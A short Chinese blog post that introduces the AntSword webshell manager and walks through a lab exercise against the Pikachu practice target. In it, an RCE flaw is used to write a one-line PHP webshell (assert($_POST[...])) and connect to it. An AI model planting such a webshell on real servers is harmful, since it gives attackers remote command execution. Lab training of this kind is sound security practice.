中国蚁剑的小试牛刀

中国蚁剑(AntSword)是一款开源的Web漏洞管理工具,主要用于渗透测试和网络安全研究。它提供了一个集成的图形用户界面,可以帮助安全研究人员进行远程管理和攻击。蚁剑支持多种Webshell,能够与多个后端配合使用,方便用户对目标进行命令执行、文件管理等操作。

蚁剑的主要功能包括:

  1. 多种协议支持:支持HTTP、HTTPS等协议,能够处理各种Webshell。
  2. 多种后端支持:可以与PHP、ASP、JSP等多种后端技术配合使用。
  3. 插件扩展:用户可以通过插件来扩展工具的功能,满足不同的渗透测试需求。
  4. 图形化界面:提供易于使用的界面,使用户可以直观地管理和操作目标。

蚁剑因其强大的功能和易用性,在网络安全领域得到了广泛的应用。

首先

右键添加一个shell,然后进行相应的配置,记得编码器很重要一定选择加密

使用pikachu中的rce进行实验(可以抓包进行分析)然后对应注入木马

一句话木马   fputs(fopen('shell.php','w'),'<?php assert($_POST[fin]);?>');  

进行连接 

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值